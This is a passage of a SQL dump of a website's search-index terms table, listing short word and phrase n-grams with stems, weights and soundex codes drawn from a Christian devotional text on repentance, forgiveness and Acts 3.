(283713, '1 8 10', '1 8 10', 0, 1, 1.2, '', 1, '*'),
(283714, '1 john 1', '1 john 1', 0, 1, 1.2667, 'J500', 1, '*'),
(283715, '10 verse', '10 verse', 0, 1, 1.2667, 'V620', 1, '*'),
(283716, '10 verse 20', '10 verse 20', 0, 1, 1.3667, 'V620', 1, '*'),
(283717, '17 don\'t', '17 don', 0, 1, 1.2667, 'D530', 1, '*'),
(283718, '17 don\'t condemn', '17 don condemn', 0, 1, 1.5333, 'D532535', 1, '*'),
(283719, '17 end', '17 end', 0, 1, 1.2, 'E530', 1, '*'),
(283720, '17 end and', '17 end and', 0, 1, 1.3333, 'E5353', 1, '*'),
(283721, '18 but', '18 but', 0, 1, 1.2, 'B300', 1, '*'),
(283722, '18 but those', '18 but those', 0, 1, 1.4, 'B320', 1, '*'),
(283723, '18 let', '18 let', 0, 1, 1.2, 'L300', 1, '*'),
(283724, '18 let him', '18 let him', 0, 1, 1.3333, 'L350', 1, '*'),
(283725, '19 demand', '19 demand', 0, 1, 1.3, 'D530', 1, '*'),
(283726, '19 demand for', '19 demand for', 0, 1, 1.4333, 'D5316', 1, '*'),
(283727, '19 repent', '19 repent', 0, 1, 1.3, 'R153', 1, '*'),
(283728, '19 repent ye', '19 repent ye', 0, 1, 1.4, 'R153', 1, '*'),
(283729, '20 26', '20 26', 0, 1, 1.1667, '', 1, '*'),
(283730, '20 26 help', '20 26 help', 0, 1, 1.3333, 'H410', 1, '*'),
(283731, '20 and he', '20 and he', 0, 1, 1.3, 'A530', 1, '*'),
(283732, '21 whom', '21 whom', 0, 1, 1.2333, 'W500', 1, '*'),
(283733, '21 whom the', '21 whom the', 0, 1, 1.3667, 'W530', 1, '*'),
(283734, '22 for moses', '22 for moses', 0, 1, 1.4, 'F652', 1, '*'),
(283735, '23 and', '23 and', 0, 1, 1.2, 'A530', 1, '*'),
(283736, '23 and it', '23 and it', 0, 1, 1.3, 'A530', 1, '*'),
(283737, '24 yea', '24 yea', 0, 1, 1.2, 'Y000', 1, '*'),
(283738, '24 yea and', '24 yea and', 0, 1, 1.3333, 'Y530', 1, '*'),
(283739, '25 ye', '25 ye', 0, 1, 1.1667, 'Y000', 1, '*'),
(283740, '25 ye are', '25 ye are', 0, 1, 1.3, 'Y600', 1, '*'),
(283741, '26 help', '26 help', 0, 1, 1.2333, 'H410', 1, '*'),
(283742, '26 help him', '26 help him', 0, 1, 1.3667, 'H415', 1, '*'),
(283743, '26 unto', '26 unto', 0, 1, 1.2333, 'U530', 1, '*'),
(283744, '26 unto you', '26 unto you', 0, 1, 1.3667, 'U530', 1, '*'),
(283745, '28 salvation', '28 salvation', 0, 1, 1.4, 'S4135', 1, '*'),
(283746, '3 17 end', '3 17 end', 0, 1, 1.2667, 'E530', 1, '*'),
(283747, '8 10', '8 10', 0, 1, 1.1333, '', 1, '*'),
(283748, '8 10 verse', '8 10 verse', 0, 1, 1.3333, 'V620', 1, '*'),
(283749, 'a prophet shall', 'a prophet shall', 0, 1, 1.5, 'A161324', 1, '*'),
(283750, 'about the forgiveness', 'about the forgiveness', 0, 1, 1.7, 'A13162152', 1, '*'),
(283751, 'abraham and', 'abraham and', 0, 1, 1.3667, 'A1653', 1, '*'),
(283752, 'abraham and in', 'abraham and in', 0, 1, 1.4667, 'A16535', 1, '*'),
(283753, 'acts 3', 'act 3', 0, 1, 1.2, 'A232', 1, '*'),
(283754, 'acts 3 17', 'act 3 17', 0, 1, 1.3, 'A232', 1, '*'),
(283755, 'after as', 'after as', 0, 1, 1.2667, 'A1362', 1, '*'),
(283756, 'after as many', 'after as many', 0, 1, 1.4333, 'A13625', 1, '*'),
(283757, 'all his', 'all his', 0, 1, 1.2333, 'A420', 2, '*'),
(283758, 'all his holy', 'all his holy', 0, 1, 1.4, 'A424', 1, '*'),
(283759, 'all his prophets', 'all his prophets', 0, 1, 1.5333, 'A4216132', 1, '*'),
(283760, 'all the kindreds', 'all the kindreds', 0, 1, 1.5333, 'A43253632', 1, '*'),
(283761, 'all the prophets', 'all the prophets', 0, 1, 1.5333, 'A4316132', 1, '*'),
(283762, 'all things whatsoever', 'all things whatsoever', 0, 1, 1.7, 'A43523216', 1, '*'),
(283763, 'all things which', 'all things which', 0, 1, 1.5333, 'A4352', 1, '*'),
(283764, 'also your', 'also your', 0, 1, 1.3, 'A426', 1, '*'),
(283765, 'also your rulers', 'also your rulers', 0, 1, 1.5333, 'A426462', 1, '*'),
(283766, 'among the people', 'among the people', 0, 1, 1.5333, 'A52314', 1, '*'),
(283767, 'amongst', 'amongst', 0, 0, 0.4667, 'A523', 1, '*'),
(283768, 'amongst other', 'amongst other', 0, 1, 1.4333, 'A5236', 1, '*'),
(283769, 'amongst other things', 'amongst other things', 0, 1, 1.6667, 'A5236352', 1, '*'),
(283770, 'and all the', 'and all the', 0, 1, 1.3667, 'A5343', 1, '*'),
(283771, 'and now brethren', 'and now brethren', 0, 1, 1.5333, 'A53516365', 1, '*'),
(283772, 'and of the', 'and of the', 0, 1, 1.3333, 'A5313', 1, '*'),
(283773, 'and the resurrection', 'and the resurrection', 0, 1, 1.6667, 'A53626235', 1, '*'),
(283774, 'and those that', 'and those that', 0, 1, 1.4667, 'A5323', 1, '*'),
(283775, 'and your problem', 'and your problem', 0, 1, 1.5333, 'A53616145', 1, '*'),
(283776, 'are good but', 'ar good but', 0, 1, 1.4, 'A62313', 1, '*'),
(283777, 'are his help', 'ar his help', 0, 1, 1.4, 'A6241', 1, '*'),
(283778, 'are the children', 'ar the children', 0, 1, 1.5333, 'A6324365', 1, '*'),
(283779, 'as did', 'as did', 0, 1, 1.2, 'A230', 1, '*'),
(283780, 'as did also', 'as did also', 0, 1, 1.3667, 'A2342', 1, '*'),
(283781, 'as have', 'as have', 0, 1, 1.2333, 'A210', 1, '*'),
(283782, 'as have spoken', 'as have spoken', 0, 1, 1.4667, 'A212125', 1, '*'),
(283783, 'as many', 'as many', 0, 1, 1.2333, 'A250', 1, '*'),
(283784, 'as many as', 'as many as', 0, 1, 1.3333, 'A252', 1, '*'),
(283785, 'as you lead', 'as you lead', 0, 1, 1.3667, 'A243', 1, '*'),
(283786, 'attempting', 'attempt', 0, 0, 0.6667, 'A351352', 1, '*'),
(283787, 'attempting to', 'attempt to', 0, 1, 1.4333, 'A3513523', 1, '*'),
(283788, 'attempting to lead', 'attempt to lead', 0, 1, 1.6, 'A351352343', 1, '*'),
(283789, 'away every', 'awai every', 0, 1, 1.3333, 'A160', 1, '*'),
(283790, 'away every one', 'awai every one', 0, 1, 1.4667, 'A165', 1, '*'),
(283791, 'back to', 'back to', 0, 1, 1.2333, 'B230', 3, '*'),
(283792, 'back to god', 'back to god', 0, 1, 1.3667, 'B2323', 1, '*'),
(283793, 'be blessed 26', 'be blessed 26', 0, 1, 1.4333, 'B423', 1, '*'),
(283794, 'be destroyed', 'be destroyed', 0, 1, 1.4, 'B32363', 1, '*'),
(283795, 'be destroyed from', 'be destroyed from', 0, 1, 1.5667, 'B32363165', 1, '*'),
(283796, 'be muslim', 'be muslim', 0, 1, 1.3, 'B5245', 1, '*'),
(283797, 'be muslim celestial', 'be muslim celestial', 0, 1, 1.6333, 'B524524234', 1, '*'),
(283798, 'be told', 'be told', 0, 1, 1.2333, 'B343', 1, '*'),
(283799, 'be told amongst', 'be told amongst', 0, 1, 1.5, 'B343523', 1, '*'),
(283800, 'before had', 'befor had', 0, 1, 1.3333, 'B630', 1, '*'),
(283801, 'before had shewed', 'befor had shewed', 0, 1, 1.5667, 'B6323', 1, '*'),
(283802, 'before was', 'befor was', 0, 1, 1.3333, 'B620', 1, '*'),
(283803, 'before was preached', 'befor was preached', 0, 1, 1.6333, 'B621623', 1, '*'),
(283804, 'began 22', 'began 22', 0, 1, 1.2667, 'B250', 1, '*'),
(283805, 'began 22 for', 'began 22 for', 0, 1, 1.4, 'B2516', 1, '*'),
(283806, 'bless you in', 'bless you in', 0, 1, 1.4, 'B425', 1, '*'),
(283807, 'blessed 26', 'bless 26', 0, 1, 1.3333, 'B423', 1, '*'),
(283808, 'blessed 26 unto', 'bless 26 unto', 0, 1, 1.5, 'B42353', 1, '*'),
(283809, 'brethren', 'brethren', 0, 0, 0.5333, 'B6365', 1, '*'),
(283810, 'brethren i', 'brethren i', 0, 1, 1.3333, 'B6365', 1, '*'),
(283811, 'brethren i wot', 'brethren i wot', 0, 1, 1.4667, 'B63653', 1, '*'),
(283812, 'brethren like', 'brethren like', 0, 1, 1.4333, 'B636542', 1, '*'),
(283813, 'brethren like unto', 'brethren like unto', 0, 1, 1.6, 'B63654253', 1, '*'),
(283814, 'bring him', 'bring him', 0, 1, 1.3, 'B6525', 1, '*'),
(283815, 'bring him back', 'bring him back', 0, 1, 1.4667, 'B652512', 1, '*'),
(283816, 'but those things', 'but those things', 0, 1, 1.5333, 'B32352', 1, '*'),
(283817, 'but will not', 'but will not', 0, 1, 1.4, 'B3453', 1, '*'),
(283818, 'by the mouth', 'by the mouth', 0, 1, 1.4, 'B353', 1, '*'),
(283819, 'c s', 'c s', 0, 1, 1.1, 'C000', 1, '*'),
(283820, 'c s occultist', 'c s occultist', 0, 1, 1.4333, 'C4323', 1, '*'),
(283821, 'can pray', 'can pray', 0, 1, 1.2667, 'C516', 1, '*'),
(283822, 'can pray for', 'can pray for', 0, 1, 1.4, 'C51616', 1, '*'),
(283823, 'celestial', 'celesti', 0, 0, 0.6, 'C4234', 1, '*'),
(283824, 'celestial c', 'celesti c', 0, 1, 1.3667, 'C42342', 1, '*'),
(283825, 'celestial c s', 'celesti c s', 0, 1, 1.4333, 'C42342', 1, '*'),
(283826, 'change of', 'chang of', 0, 1, 1.3, 'C521', 1, '*'),
(283827, 'change of heart', 'chang of heart', 0, 1, 1.5, 'C52163', 1, '*'),
(283828, 'change of lordship', 'chang of lordship', 0, 1, 1.6, 'C52146321', 1, '*'),
(283829, 'change of ways', 'chang of ways', 0, 1, 1.4667, 'C5212', 1, '*'),
(283830, 'cheating', 'cheat', 0, 0, 0.5333, 'C352', 1, '*'),
(283831, 'cheating come', 'cheat come', 0, 1, 1.4333, 'C3525', 1, '*'),
(283832, 'cheating come to', 'cheat come to', 0, 1, 1.5333, 'C35253', 1, '*'),
(283833, 'children of the', 'children of the', 0, 1, 1.5, 'C436513', 1, '*'),
(283834, 'christ in jesus', 'christ in jesus', 0, 1, 1.5, 'C62352', 1, '*'),
(283835, 'christ is god\'s', 'christ is god', 0, 1, 1.5, 'C623232', 1, '*'),
(283836, 'christ should', 'christ should', 0, 1, 1.4333, 'C623243', 1, '*'),
(283837, 'christ should suffer', 'christ should suffer', 0, 1, 1.6667, 'C623243216', 1, '*'),
(283838, 'christ which before', 'christ which before', 0, 1, 1.6333, 'C623216', 1, '*'),
(283839, 'christ you', 'christ you', 0, 1, 1.3333, 'C623', 1, '*'),
(283840, 'christ you must', 'christ you must', 0, 1, 1.5, 'C623523', 1, '*'),
(283841, 'church next', 'church next', 0, 1, 1.3667, 'C62523', 1, '*'),
(283842, 'church next week', 'church next week', 0, 1, 1.5333, 'C625232', 1, '*'),
(283843, 'cigarettes', 'cigarett', 0, 0, 0.6667, 'C632', 1, '*'),
(283844, 'cigarettes or', 'cigarett or', 0, 1, 1.4333, 'C6326', 1, '*'),
(283845, 'cigarettes or womanizing', 'cigarett or womanizing', 0, 1, 1.8, 'C63265252', 1, '*'),
(283846, 'come to die', 'come to die', 0, 1, 1.3667, 'C530', 1, '*'),
(283847, 'come to our', 'come to our', 0, 1, 1.3667, 'C536', 1, '*'),
(283848, 'come to pass', 'come to pass', 0, 1, 1.4, 'C5312', 1, '*'),
(283849, 'condemn', 'condemn', 0, 0, 0.4667, 'C535', 1, '*'),
(283850, 'condemn him', 'condemn him', 0, 1, 1.3667, 'C535', 1, '*'),
(283851, 'condemn him he', 'condemn him he', 0, 1, 1.4667, 'C535', 1, '*'),
(283852, 'covenant which', 'coven which', 0, 1, 1.4667, 'C1532', 1, '*'),
(283853, 'covenant which god', 'coven which god', 0, 1, 1.6, 'C15323', 1, '*'),
(283854, 'creature and', 'creatur and', 0, 1, 1.4, 'C63653', 1, '*'),
(283855, 'creature and god', 'creatur and god', 0, 1, 1.5333, 'C6365323', 1, '*'),
(283856, 'critical points', 'critic points', 0, 1, 1.5, 'C63241532', 1, '*'),
(283857, 'critical points in', 'critic points in', 0, 1, 1.6, 'C632415325', 1, '*'),
(283858, 'cross and', 'cross and', 0, 1, 1.3, 'C6253', 1, '*'),
(283859, 'cross and the', 'cross and the', 0, 1, 1.4333, 'C6253', 1, '*'),
(283860, 'darkness you', 'dark you', 0, 1, 1.4, 'D6252', 1, '*'),
(283861, 'darkness you are', 'dark you are', 0, 1, 1.5333, 'D62526', 1, '*'),
(283862, 'days 25', 'dai 25', 0, 1, 1.2333, 'D200', 1, '*'),
(283863, 'days 25 ye', 'dai 25 ye', 0, 1, 1.3333, 'D200', 1, '*'),
(283864, 'death on', 'death on', 0, 1, 1.2667, 'D500', 1, '*'),
(283865, 'death on the', 'death on the', 0, 1, 1.4, 'D530', 1, '*'),
(283866, 'demand', 'demand', 0, 0, 0.4, 'D530', 1, '*'),
(283867, 'demand for', 'demand for', 0, 1, 1.3333, 'D5316', 1, '*'),
(283868, 'demand for repentance', 'demand for repentance', 0, 1, 1.7, 'D531615352', 1, '*'),
(283869, 'destroyed', 'destroi', 0, 0, 0.6, 'D2363', 1, '*'),
(283870, 'destroyed from', 'destroi from', 0, 1, 1.4667, 'D2363165', 1, '*'),
(283871, 'destroyed from among', 'destroi from among', 0, 1, 1.6667, 'D23631652', 1, '*'),
(283872, 'did also', 'did also', 0, 1, 1.2667, 'D420', 1, '*'),
(283873, 'did also your', 'did also your', 0, 1, 1.4333, 'D426', 1, '*'),
(283874, 'did it as', 'did it as', 0, 1, 1.3, 'D200', 1, '*'),
(283875, 'die to save', 'die to save', 0, 1, 1.3667, 'D210', 1, '*'),
(283876, 'don\'t condemn', 'don condemn', 0, 1, 1.4333, 'D532535', 1, '*'),
(283877, 'don\'t condemn him', 'don condemn him', 0, 1, 1.5667, 'D532535', 1, '*'),
(283878, 'don\'t judge', 'don judge', 0, 1, 1.3667, 'D53232', 1, '*'),
(283879, 'don\'t judge him', 'don judge him', 0, 1, 1.5, 'D532325', 1, '*'),
(283880, 'earth be blessed', 'earth be blessed', 0, 1, 1.5333, 'E631423', 1, '*'),
(283881, 'end and', 'end and', 0, 1, 1.2333, 'E5353', 1, '*'),
(283882, 'end and now', 'end and now', 0, 1, 1.3667, 'E53535', 1, '*'),
(283883, 'etc he', 'etc he', 0, 1, 1.2, 'E320', 1, '*'),
(283884, 'etc he must', 'etc he must', 0, 1, 1.3667, 'E32523', 1, '*'),
(283885, 'etc when', 'etc when', 0, 1, 1.2667, 'E325', 1, '*'),
(283886, 'etc when you', 'etc when you', 0, 1, 1.4, 'E325', 1, '*'),
(283887, 'every one of', 'everi one of', 0, 1, 1.4, 'E1651', 1, '*'),
(283888, 'every soul', 'everi soul', 0, 1, 1.3333, 'E1624', 1, '*'),
(283889, 'every soul which', 'everi soul which', 0, 1, 1.5333, 'E16242', 1, '*'),
(283890, 'extent', 'extent', 0, 0, 0.4, 'E2353', 1, '*'),
(283891, 'extent of', 'extent of', 0, 1, 1.3, 'E23531', 1, '*'),
(283892, 'extent of jesus\'', 'extent of jesus', 0, 1, 1.5333, 'E235312', 1, '*'),
(283893, 'fathers a', 'father a', 0, 1, 1.3, 'F362', 1, '*'),
(283894, 'fathers a prophet', 'father a prophet', 0, 1, 1.5667, 'F3621613', 1, '*'),
(283895, 'fathers saying', 'father saying', 0, 1, 1.4667, 'F36252', 1, '*'),
(283896, 'fathers saying unto', 'father saying unto', 0, 1, 1.6333, 'F3625253', 1, '*'),
(283897, 'first god', 'first god', 0, 1, 1.3, 'F62323', 1, '*'),
(283898, 'first god having', 'first god having', 0, 1, 1.5333, 'F62323152', 1, '*'),
(283899, 'follow after', 'follow after', 0, 1, 1.4, 'F4136', 1, '*'),
(283900, 'follow after as', 'follow after as', 0, 1, 1.5, 'F41362', 1, '*'),
(283901, 'following god', 'follow god', 0, 1, 1.4333, 'F4523', 1, '*'),
(283902, 'following god tell', 'follow god tell', 0, 1, 1.6, 'F45234', 1, '*'),
(283903, 'following points are', 'follow points are', 0, 1, 1.6667, 'F45215326', 1, '*'),
(283904, 'following self', 'follow self', 0, 1, 1.4667, 'F45241', 1, '*'),
(283905, 'following self to', 'follow self to', 0, 1, 1.5667, 'F452413', 1, '*'),
(283906, 'for his salvation', 'for his salvation', 0, 1, 1.5667, 'F624135', 1, '*'),
(283907, 'for jesus the', 'for jesus the', 0, 1, 1.4333, 'F623', 1, '*'),
(283908, 'for moses', 'for moses', 0, 1, 1.3, 'F652', 1, '*'),
(283909, 'for moses truly', 'for moses truly', 0, 1, 1.5, 'F652364', 1, '*'),
(283910, 'for repentance', 'for repentance', 0, 1, 1.4667, 'F615352', 1, '*'),
(283911, 'for repentance change', 'for repentance change', 0, 1, 1.7, 'F61535252', 1, '*'),
(283912, 'foretold', 'foretold', 0, 0, 0.5333, 'F6343', 1, '*'),
(283913, 'foretold of', 'foretold of', 0, 1, 1.3667, 'F63431', 1, '*'),
(283914, 'foretold of these', 'foretold of these', 0, 1, 1.5667, 'F6343132', 1, '*'),
(283915, 'forgiveness', 'forgiv', 0, 0, 0.7333, 'F62152', 1, '*'),
(283916, 'forgiveness that', 'forgiv that', 0, 1, 1.5333, 'F621523', 1, '*'),
(283917, 'forgiveness that god', 'forgiv that god', 0, 1, 1.6667, 'F62152323', 1, '*'),
(283918, 'from among', 'from among', 0, 1, 1.3333, 'F652', 1, '*'),
(283919, 'from among the', 'from among the', 0, 1, 1.4667, 'F6523', 1, '*'),
(283920, 'from following', 'from following', 0, 1, 1.4667, 'F651452', 1, '*'),
(283921, 'from following self', 'from following self', 0, 1, 1.6333, 'F65145241', 1, '*'),
(283922, 'from his', 'from his', 0, 1, 1.2667, 'F652', 1, '*'),
(283923, 'from his iniquities', 'from his iniquities', 0, 1, 1.6333, 'F6525232', 1, '*'),
(283924, 'from samuel', 'from samuel', 0, 1, 1.3667, 'F65254', 1, '*'),
(283925, 'from samuel and', 'from samuel and', 0, 1, 1.5, 'F6525453', 1, '*'),
(283926, 'fulfilled 19', 'fulfil 19', 0, 1, 1.4, 'F4143', 1, '*'),
(283927, 'fulfilled 19 repent', 'fulfil 19 repent', 0, 1, 1.6333, 'F41436153', 1, '*'),
(283928, 'gives 1', 'give 1', 0, 1, 1.2333, 'G120', 1, '*'),
(283929, 'gives 1 john', 'give 1 john', 0, 1, 1.4, 'G125', 1, '*'),
(283930, 'go etc', 'go etc', 0, 1, 1.2, 'G320', 1, '*'),
(283931, 'go etc when', 'go etc when', 0, 1, 1.3667, 'G325', 1, '*'),
(283932, 'god before', 'god before', 0, 1, 1.3333, 'G316', 1, '*'),
(283933, 'god before had', 'god before had', 0, 1, 1.4667, 'G3163', 1, '*'),
(283934, 'god has gone', 'god has gone', 0, 1, 1.4, 'G325', 1, '*'),
(283935, 'god hath spoken', 'god hath spoken', 0, 1, 1.5, 'G32125', 1, '*'),
(283936, 'god having', 'god having', 0, 1, 1.3333, 'G3152', 1, '*'),
(283937, 'god having raised', 'god having raised', 0, 1, 1.5667, 'G3152623', 1, '*'),
(283938, 'god loves', 'god loves', 0, 1, 1.3, 'G3412', 2, '*'),
(283939, 'god loves him', 'god loves him', 0, 1, 1.4333, 'G34125', 1, '*'),
(283940, 'god made with', 'god made with', 0, 1, 1.4333, 'G353', 1, '*'),
(283941, 'god may god', 'god may god', 0, 1, 1.3667, 'G3523', 1, '*'),
(283942, 'god only', 'god only', 0, 1, 1.2667, 'G354', 2, '*'),
(283943, 'god only gives', 'god only gives', 0, 1, 1.4667, 'G354212', 1, '*'),
(283944, 'god raise', 'god raise', 0, 1, 1.3, 'G362', 1, '*'),
(283945, 'god raise up', 'god raise up', 0, 1, 1.4, 'G3621', 1, '*'),
(283946, 'god tell', 'god tell', 0, 1, 1.2667, 'G340', 1, '*'),
(283947, 'god tell him', 'god tell him', 0, 1, 1.4, 'G345', 1, '*'),
(283948, 'god whoever', 'god whoever', 0, 1, 1.3667, 'G316', 1, '*'),
(283949, 'god whoever he', 'god whoever he', 0, 1, 1.4667, 'G316', 1, '*'),
(283950, 'god\'s creature', 'god creature', 0, 1, 1.4667, 'G32636', 1, '*'),
(283951, 'god\'s creature and', 'god creature and', 0, 1, 1.6, 'G3263653', 1, '*'),
(283952, 'god\'s love', 'god love', 0, 1, 1.3333, 'G3241', 1, '*'),
(283953, 'god\'s love not', 'god love not', 0, 1, 1.4667, 'G324153', 1, '*'),
(283954, 'gone to', 'gone to', 0, 1, 1.2333, 'G530', 1, '*'),
(283955, 'gone to the', 'gone to the', 0, 1, 1.3667, 'G530', 1, '*'),
(283956, 'good but', 'good but', 0, 1, 1.2667, 'G313', 1, '*'),
(283957, 'good but will', 'good but will', 0, 1, 1.4333, 'G3134', 1, '*'),
(283958, 'gospel of salvation', 'gospel of salvation', 0, 1, 1.6333, 'G14124135', 1, '*'),
(283959, 'had shewed', 'had shewed', 0, 1, 1.3333, 'H323', 1, '*'),
(283960, 'had shewed by', 'had shewed by', 0, 1, 1.4333, 'H3231', 1, '*'),
(283961, 'has gone', 'ha gone', 0, 1, 1.2667, 'H250', 1, '*'),
(283962, 'has gone to', 'ha gone to', 0, 1, 1.3667, 'H253', 1, '*'),
(283963, 'hath so', 'hath so', 0, 1, 1.2333, 'H320', 1, '*'),
(283964, 'hath so fulfilled', 'hath so fulfilled', 0, 1, 1.5667, 'H3214143', 1, '*'),
(283965, 'hath spoken', 'hath spoken', 0, 1, 1.3667, 'H32125', 1, '*'),
(283966, 'hath spoken by', 'hath spoken by', 0, 1, 1.4667, 'H321251', 1, '*'),
(283967, 'have come to', 'have come to', 0, 1, 1.4, 'H1253', 2, '*'),
(283968, 'have likewise', 'have likewise', 0, 1, 1.4333, 'H142', 1, '*'),
(283969, 'have likewise foretold', 'have likewise foretold', 0, 1, 1.7333, 'H14216343', 1, '*'),
(283970, 'have spoken', 'have spoken', 0, 1, 1.3667, 'H12125', 1, '*'),
(283971, 'have spoken have', 'have spoken have', 0, 1, 1.5333, 'H121251', 1, '*'),
(283972, 'have the privilege', 'have the privilege', 0, 1, 1.6, 'H1316142', 1, '*'),
(283973, 'having raised', 'have raised', 0, 1, 1.4333, 'H152623', 1, '*'),
(283974, 'having raised up', 'have raised up', 0, 1, 1.5333, 'H1526231', 1, '*'),
(283975, 'he be', 'he be', 0, 1, 1.1667, 'H100', 1, '*'),
(283976, 'he be told', 'he be told', 0, 1, 1.3333, 'H1343', 1, '*'),
(283977, 'he hath', 'he hath', 0, 1, 1.2333, 'H300', 1, '*'),
(283978, 'he hath so', 'he hath so', 0, 1, 1.3333, 'H320', 1, '*'),
(283979, 'he is god\'s', 'he is god', 0, 1, 1.3667, 'H232', 1, '*'),
(283980, 'he is in', 'he is in', 0, 1, 1.2667, 'H250', 1, '*'),
(283981, 'he is sinning', 'he is sinning', 0, 1, 1.4333, 'H252', 1, '*'),
(283982, 'he may', 'he may', 0, 1, 1.2, 'H500', 1, '*'),
(283983, 'he may be', 'he may be', 0, 1, 1.3, 'H510', 1, '*'),
(283984, 'he must', 'he must', 0, 1, 1.2333, 'H523', 1, '*'),
(283985, 'he must switch', 'he must switch', 0, 1, 1.4667, 'H523232', 1, '*'),
(283986, 'he shall say', 'he shall say', 0, 1, 1.4, 'H242', 1, '*'),
(283987, 'he shall send', 'he shall send', 0, 1, 1.4333, 'H24253', 1, '*'),
(283988, 'hear in', 'hear in', 0, 1, 1.2333, 'H650', 1, '*'),
(283989, 'hear in all', 'hear in all', 0, 1, 1.3667, 'H654', 1, '*'),
(283990, 'hear that', 'hear that', 0, 1, 1.3, 'H630', 1, '*'),
(283991, 'hear that prophet', 'hear that prophet', 0, 1, 1.5667, 'H631613', 1, '*'),
(283992, 'heart change', 'heart change', 0, 1, 1.4, 'H63252', 1, '*'),
(283993, 'heart change of', 'heart change of', 0, 1, 1.5, 'H632521', 1, '*'),
(283994, 'hearts for', 'heart for', 0, 1, 1.3333, 'H63216', 1, '*'),
(283995, 'hearts for jesus', 'heart for jesus', 0, 1, 1.5333, 'H632162', 1, '*'),
(283996, 'heaven must', 'heaven must', 0, 1, 1.3667, 'H1523', 1, '*'),
(283997, 'heaven must receive', 'heaven must receive', 0, 1, 1.6333, 'H1523621', 1, '*'),
(283998, 'help him', 'help him', 0, 1, 1.2667, 'H415', 1, '*'),
(283999, 'help him to', 'help him to', 0, 1, 1.3667, 'H4153', 1, '*'),
(284000, 'help him verse', 'help him verse', 0, 1, 1.4667, 'H415162', 1, '*'),
(284001, 'help into', 'help into', 0, 1, 1.3, 'H4153', 1, '*'),
(284002, 'help into the', 'help into the', 0, 1, 1.4333, 'H4153', 1, '*'),
(284003, 'help you as', 'help you as', 0, 1, 1.3667, 'H412', 1, '*'),
(284004, 'him about', 'him about', 0, 1, 1.3, 'H513', 1, '*'),
(284005, 'him about the', 'him about the', 0, 1, 1.4333, 'H513', 1, '*'),
(284006, 'him back', 'him back', 0, 1, 1.2667, 'H512', 1, '*'),
(284007, 'him back to', 'him back to', 0, 1, 1.3667, 'H5123', 1, '*'),
(284008, 'him god loves', 'him god loves', 0, 1, 1.4333, 'H523412', 1, '*'),
(284009, 'him god\'s', 'him god', 0, 1, 1.3, 'H5232', 1, '*'),
(284010, 'him god\'s love', 'him god love', 0, 1, 1.4667, 'H523241', 1, '*'),
(284011, 'him he', 'him he', 0, 1, 1.2, 'H500', 1, '*'),
(284012, 'him he is', 'him he is', 0, 1, 1.3, 'H520', 1, '*'),
(284013, 'him help', 'him help', 0, 1, 1.2667, 'H541', 1, '*'),
(284014, 'him help him', 'him help him', 0, 1, 1.4, 'H5415', 1, '*'),
(284015, 'him know', 'him know', 0, 1, 1.2667, 'H525', 1, '*'),
(284016, 'him know that', 'him know that', 0, 1, 1.4333, 'H5253', 1, '*'),
(284017, 'him shall', 'him shall', 0, 1, 1.3, 'H524', 1, '*'),
(284018, 'him shall ye', 'him shall ye', 0, 1, 1.4, 'H524', 1, '*'),
(284019, 'him that much', 'him that much', 0, 1, 1.4333, 'H5352', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(284020, 'him to bless', 'him to bless', 0, 1, 1.4, 'H53142', 1, '*'),
(284021, 'him to know', 'him to know', 0, 1, 1.3667, 'H5325', 1, '*'),
(284022, 'him to trace', 'him to trace', 0, 1, 1.4, 'H5362', 1, '*'),
(284023, 'him verse', 'him verse', 0, 1, 1.3, 'H5162', 1, '*'),
(284024, 'him verse 18', 'him verse 18', 0, 1, 1.4, 'H5162', 1, '*'),
(284025, 'his help into', 'hi help into', 0, 1, 1.4333, 'H24153', 1, '*'),
(284026, 'his holy', 'hi holy', 0, 1, 1.2667, 'H240', 1, '*'),
(284027, 'his holy prophets', 'hi holy prophets', 0, 1, 1.5667, 'H2416132', 1, '*'),
(284028, 'his iniquities', 'hi iniquities', 0, 1, 1.4667, 'H25232', 1, '*'),
(284029, 'his iniquities introduction', 'hi iniquities introduction', 0, 1, 1.9, 'H252325363235', 1, '*'),
(284030, 'his prophets', 'hi prophets', 0, 1, 1.4, 'H216132', 1, '*'),
(284031, 'his prophets that', 'hi prophets that', 0, 1, 1.5667, 'H2161323', 1, '*'),
(284032, 'his roots', 'hi roots', 0, 1, 1.3, 'H2632', 1, '*'),
(284033, 'his roots back', 'hi roots back', 0, 1, 1.4667, 'H263212', 1, '*'),
(284034, 'his salvation', 'hi salvation', 0, 1, 1.4333, 'H24135', 1, '*'),
(284035, 'his salvation if', 'hi salvation if', 0, 1, 1.5333, 'H241351', 1, '*'),
(284036, 'his shortcomings', 'hi shortcomings', 0, 1, 1.5333, 'H263252', 1, '*'),
(284037, 'his shortcomings verse', 'hi shortcomings verse', 0, 1, 1.7333, 'H263252162', 1, '*'),
(284038, 'his son jesus', 'hi son jesus', 0, 1, 1.4333, 'H252', 1, '*'),
(284039, 'holy prophets', 'holi prophets', 0, 1, 1.4333, 'H416132', 1, '*'),
(284040, 'holy prophets since', 'holi prophets since', 0, 1, 1.6333, 'H41613252', 1, '*'),
(284041, 'how he', 'how he', 0, 1, 1.2, 'H000', 2, '*'),
(284042, 'how he is', 'how he is', 0, 1, 1.3, 'H200', 1, '*'),
(284043, 'i wot', 'i wot', 0, 1, 1.1667, 'I300', 1, '*'),
(284044, 'i wot that', 'i wot that', 0, 1, 1.3333, 'I300', 1, '*'),
(284045, 'if he was', 'if he was', 0, 1, 1.3, 'I120', 1, '*'),
(284046, 'ignorance he', 'ignor he', 0, 1, 1.4, 'I25652', 1, '*'),
(284047, 'ignorance he is', 'ignor he is', 0, 1, 1.5, 'I25652', 1, '*'),
(284048, 'ignorance ye', 'ignor ye', 0, 1, 1.4, 'I25652', 1, '*'),
(284049, 'ignorance ye did', 'ignor ye did', 0, 1, 1.5333, 'I256523', 1, '*'),
(284050, 'in attempting', 'in attempting', 0, 1, 1.4333, 'I5351352', 1, '*'),
(284051, 'in attempting to', 'in attempting to', 0, 1, 1.5333, 'I53513523', 1, '*'),
(284052, 'in darkness', 'in darkness', 0, 1, 1.3667, 'I536252', 1, '*'),
(284053, 'in darkness you', 'in darkness you', 0, 1, 1.5, 'I536252', 1, '*'),
(284054, 'in ignorance', 'in ignorance', 0, 1, 1.4, 'I525652', 1, '*'),
(284055, 'in ignorance he', 'in ignorance he', 0, 1, 1.5, 'I525652', 1, '*'),
(284056, 'in the gospel', 'in the gospel', 0, 1, 1.4333, 'I53214', 1, '*'),
